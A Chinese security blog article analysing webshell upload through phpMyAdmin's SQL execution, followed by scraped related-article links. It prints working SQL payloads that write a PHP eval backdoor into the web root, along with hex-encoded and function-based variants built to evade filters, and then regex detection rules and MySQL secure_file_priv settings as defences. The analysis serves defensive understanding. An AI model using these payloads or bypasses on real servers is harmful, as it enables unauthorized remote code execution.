目录

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性

0x1: Mysql SQL预编译(PREPARE Syntax)

/*

1. stmt_name: The PREPARE statement prepares a SQL statement and assigns it a name, stmt_name, by which to refer to the statement later.

2. preparable_stmt: preparable_stmt is either a string literal or a user variable that contains the text of the SQL statement. The text must represent a single statement, not multiple statements.

*/

PREPARE stmt_name FROM preparable_stmt

0x2: Mysql SQL执行(EXECUTE Syntax)

EXECUTE stmt_name

    [USING @var_name [, @var_name] ...]

//After preparing a statement with PREPARE, you execute it with an EXECUTE statement that refers to the prepared statement name. If the prepared statement contains any parameter markers, you must supply a USING clause that lists user variables containing the values to be bound to the parameters.

Relevant Link:

https://dev.mysql.com/doc/refman/5.0/en/prepare.html

https://dev.mysql.com/doc/refman/5.0/en/execute.html

http://zone.wooyun.org/content/22606

2. 漏洞触发条件

. 已知phpmyadmin的root密码,即mysql的root密码(phpmyadmin只是通过web方式连接mysql的工具)

    ) mysql本身默认的弱口令

    ) 通过其他漏洞(例如注入)获得了mysql的root密码

. 已知网站的物理路径

    ) 在phpmyadmin的后台的"变量"tab页面,可以看到mysql的物理路径,从而推测出网站的物理路径

    ) 通过其他web漏洞获得网站的物理路径

通过phpmyadmin进行getshell的核心就是通过sql进行文件写的操作,常见的sql如下

-------

DROP TABLE IF EXISTS `a`;

Create TABLE a (cmd text NOT NULL);

Insert INTO a (cmd) VALUES('xx');

select cmd from a into outfile 'C:/phpStudy/WWW/ali.php'

Drop TABLE IF EXISTS a;

-------

-------

select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/exehack.php'

-------

-------

set @strSql = replace("select '<?php @eval($_POST[pass]);?>' outo outfile 'c:/WWW/phpMyAdmin/alibaba.php'","outo","into");

prepare a from @strSql;

execute a;

-------

-------

//select '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/exehack.php'

SET @SQLString = 0x73656c65637420273c3f70687020406576616c28245f504f53545b706173735d293b3f3e27494e544f204f555446494c452027643a2f77616d702f7777772f6578656861636b2e70687027;

PREPARE test FROM @SQLString;

EXECUTE test;

-------

-------

//declared mysql function

use test;

delimiter $$

CREATE FUNCTION myFunction

(in_string VARCHAR())

RETURNS VARCHAR()

BEGIN

DECLARE new_string VARCHAR();

SET new_string = replace(in_string,"outo","into");

RETURN(new_string);

END$$

//hack

delimiter ;

SET @SQLString = test.myFunction("select '<?php @eval($_POST[pass]);?>' outo outfile 'c:/alibaba.php'");

PREPARE test FROM @SQLString;

EXECUTE test;

-------

Relevant Link:

http://www.exehack.net/681.html

http://www.exehack.net/99.html

http://www.187299.com/archives/1695

3. 漏洞影响范围

全部phpmyadmin版本

4. 漏洞代码分析

/phpMyAdmin/import.php

所有处理用户自定义SQL解析执行的逻辑都在这个PHP文件中实现

/*

this code point is important

$import_text is the one that need to be check strictly

*/

if ($go_sql)

{

    // parse sql query

    include_once 'libraries/parse_analyze.inc.php';

    if (isset($ajax_reload) && $ajax_reload['reload'] === true)

    {

        $response = PMA_Response::getInstance();

        $response->addJSON('ajax_reload', $ajax_reload);

    }

    PMA_executeQueryAndSendQueryResponse(

        $analyzed_sql_results, false, $db, $table, null, $import_text, null,

        $analyzed_sql_results['is_affected'], null,

        null, null, null, $goto, $pmaThemeImage, null, null, null, $sql_query,

        null, null

    );

}

else if ($result)

{

    // Save a Bookmark with more than one queries (if Bookmark label given).

    if (! empty($_POST['bkm_label']) && ! empty($import_text))

    {

        PMA_storeTheQueryAsBookmark(

            $db, $GLOBALS['cfg']['Bookmark']['user'],

            $import_text, $_POST['bkm_label'],

            isset($_POST['bkm_replace']) ? $_POST['bkm_replace'] : null

        );

    }

    $response = PMA_Response::getInstance();

    $response->isSuccess(true);

    $response->addJSON('message', PMA_Message::success($msg));

    $response->addJSON(

        'sql_query',

        PMA_Util::getMessage($msg, $sql_query, 'success')

    );

}

else if ($result == false)

{

    $response = PMA_Response::getInstance();

    $response->isSuccess(false);

    $response->addJSON('message', PMA_Message::error($msg));

}

else

{

    $active_page = $goto;

    include '' . $goto;

}

5. 防御方法

对变量$import_text进行恶意检查是我们针对phpmyadmin执行sql导出文件getshell攻击的防御思路
/phpMyAdmin/import.php

} elseif (! empty($id_bookmark)) {

    // run bookmark

    $import_type = 'query';

    $format = 'sql';

}

//在文件的最开头进行SQL恶意检测,最大程度地兼容所有pmd的sql解析、执行逻辑

if(preg_match("/select.*into.*(outfile|dumpfile)/sim", $import_text, $matches)) { $erromsg = "request error!" . "</br>" . $matches[]; die($erromsg); }

//file name filter

$matchResult = preg_match_all("#\b(0[xX]){0,1}[0-9a-fA-F]+\b#", $import_text, $matchs);

if($matchResult !=  && $matchResult != FALSE)

{

    foreach ($matchs[] as $key => $value)

    {

        $hex = substr($value, );

        $import_text_hex = hex2bin($hex);

        if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)#i', strtolower($import_text_hex), $matches_1)) { $pmderromsg = "request error!" . "</br>" . $matches_1[]; die($pmderromsg); }

    }

}

要特别注意的是,在使用PHP的正则匹配引擎的时候,需要考虑到换行场景下的bypass风险
还需要注意的,MYSQL存在很多扩展语法,例如

. 定义存储过程

. 定义函数

. 定义触发器

. 使用语法预处理编译

/*

prepare stmt from 'select count(*) from information_schema.schemata';

这里待编译的sql语句也可以进行字符变形以此进行bypass

execute stmt;

*/

从攻防的本质上来讲,phpmyadmin的自定义sql导出shell接口这里的修复只是防御了攻击的一条向量,黑客还可以通过其他的攻击向量发起攻击

. 通过mysql弱口令,进mysql,添加一个账户,开启远程外连

. 通过mysql命令行连接之后,通过命令行执行sql导出文件

要想做到彻底防御,要从多个角度入手进行防御

. 对phpmyadmin的/import.php进行代码层防御,禁止用户执行导出文件相关的GETSHELL

. 对mysql的弱口令密码进行健康检测,提示管理员修改密码

. 使用主动防御Hook技术,接管文件系统,禁止mysql进行写xxx.php文件

0x2: 权限ACL控制

mysql5.7以后新增了对文件操作的ACL控制

--secure-file-priv=dir_name

Command-Line Format --secure-file-priv=dir_name
System Variable Name secure_file_priv
Variable Scope Global
Dynamic Variable No
Permitted Values (<= 5.7.5) Type string
Default empty
Valid Values empty
dirname
Permitted Values (>= 5.7.6) Type string
Default platform specific
Valid Values empty
dirname
NULL

默认情况下,利用mysql文件导出写shell会遇到如下错误

需要手工添加信任目录

Relevant Link:

http://php.net/manual/en/function.preg-match.php#111573

http://blog.sina.com.cn/s/blog_3fe961ae01013r8f.html
https://dev.mysql.com/doc/refman/5.7/en/server-options.html#option_mysqld_secure-file-priv

6. 攻防思考

Copyright (c) 2014 LittleHann All rights reserved

Getshell Via phpmyadmin SQL Execution In /import.php To Write Evil Webshell File Into Disk的更多相关文章

  1. getshell技巧-phpMyAdmin的利用

    生活就是泥沙俱下,鲜花和荆棘并存.--毕淑敏 1.明确目标2.信息收集3.漏洞挖掘和利用 信息收集 明确路径 利用目录扫描工具,对目标网站进行扫描,获取网站目录.常用工具有Kali中的DirBuste ...

  2. TT8509: PL/SQL execution terminated; PLSQL_TIMEOUT exceeded

    TT8509: PL/SQL execution terminated; PLSQL_TIMEOUT exceeded plsql_timeout连接超时,解决办法: ODBC pl/sql选项卡 修 ...

  3. sql server数据库字段名要注意不能叫file

    sql server数据库字段名要注意不能叫file 如java 中  private string  file,这是sql 的关键字

  4. PL/SQL developer export/import (转)

    export/import图标为灰色:原因:相关应用程序没有关联菜单栏 --> Tools --> Import Tables... --> Oracle Import Export ...

  5. [转载] Can't create table './store/#sql-b2c_1a.frm' (errno: 150)和sql execution error #1452添加外键时错误解决方法

    Can't create table './store/#sql-b2c_1a.frm' (errno: 150)解决方法 错误原因有四: 1.外键的引用类型不一样,主键是int外键是char 2.找 ...

  6. Error:Execution failed for task ':app:mergeDebugResources'. > Error: Some file crunching failed, see logs for details

    android studio中的资源文件命名是不能带有数字的,因为会与R类的资源ID起冲突,所以编译就发生了错误.

  7. Spark2.x(六十一):在Spark2.4 Structured Streaming中Dataset是如何执行加载数据源的?

    本章主要讨论,在Spark2.4 Structured Streaming读取kafka数据源时,kafka的topic数据是如何被执行的过程进行分析. 以下边例子展开分析: SparkSession ...

  8. Python信息采集器使用轻量级关系型数据库SQLite

    1,引言Python自带一个轻量级的关系型数据库SQLite.这一数据库使用SQL语言.SQLite作为后端数据库,可以搭配Python建网站,或者为python网络爬虫存储数据.SQLite还在其它 ...

  9. python快速教程-vamei

    2016年10月26日 12:00:53 今天开始着手python的学习,希望能高效快速的学完! Python基础(上)... 7 实验简介... 7 一.实验说明... 8 1. 环境登录... 8 ...

随机推荐

  1. LINQ 查询表达式(C# 编程指南)

    语言集成查询 (LINQ) 是一组技术的名称,这些技术建立在将查询功能直接集成到 C# 语言(以及 Visual Basic 和可能的任何其他 .NET 语言)的基础上.  借助于 LINQ,查询现在 ...

  2. iis7 运行 php5.5 的方法

    首先添加IIS. 控制面板-〉程序-〉打开或关闭Windows功能 1. 勾选“Internet 信息服务”   2. 勾选“IIS 管理控制台” Internet 信息服务-〉Web 管理工具   ...

  3. HTTP协议详细总结

    HTTP超文本传输协议,是WWW上应用的最多的协议.了解和掌握HTTP协议是对程序人员的基本要求. 转载请注明出处 http://www.cnblogs.com/zrtqsk/p/3746891.ht ...

  4. JAVA_HOME环境变量失效的解决办法

    晚上把oracle自带的weblogic给卸载了,然后打开eclipse,发现报错了:Error: could not open `C:\Java\jre7\lib\amd64\jvm.cfg' JA ...

  5. Android -- Adapter

    体系 public interface Adapter----0层(表示继承体系中的层次)  public interface ExpandableListAdapter---(无所谓层次因为没有其他 ...

  6. int,long,unsigned的值范围

    unsigned   int   0-4294967295   int   2147483648-2147483647 unsigned long 0-4294967295long   2147483 ...

  7. SQL基础之数据库

    1.基础概念 首先要强调一点,就是我们的数据库是由数据库系统来管理的,我们登入数据库并在其上进行操作时最终均要通过数据库系统来完成.可以理解成在数据库上进行操作的是客户端,数据库系统是服务端.一个数据 ...

  8. 基于PHP的AJAX学习笔记(教程)

    本文转载自:http://www.softeng.cn/?p=107 这是本人在学习ajax过程所做的笔记,通过本笔记的学习,可以完成ajax的快速入门.本笔记前端分别使用原生态的javascript ...

  9. HTML5+JS 《五子飞》游戏实现(七)游戏试玩

    前面第一至第六章我们已经把<五子飞>游戏的基本工作都已经讲得差不多了,这一章主要是把所有的代码分享给大家,然后小伙伴们也可以玩一玩. 至于人机对战的我们放到后面讲进行分析. 试玩地址:ht ...

  10. T-SQL 查询、修改数据表

    T-SQL修改表数据 INSERT语句 语法: INSERT [TOP(expression) [PERCENT]] [INTO] { <object> | rowset_function ...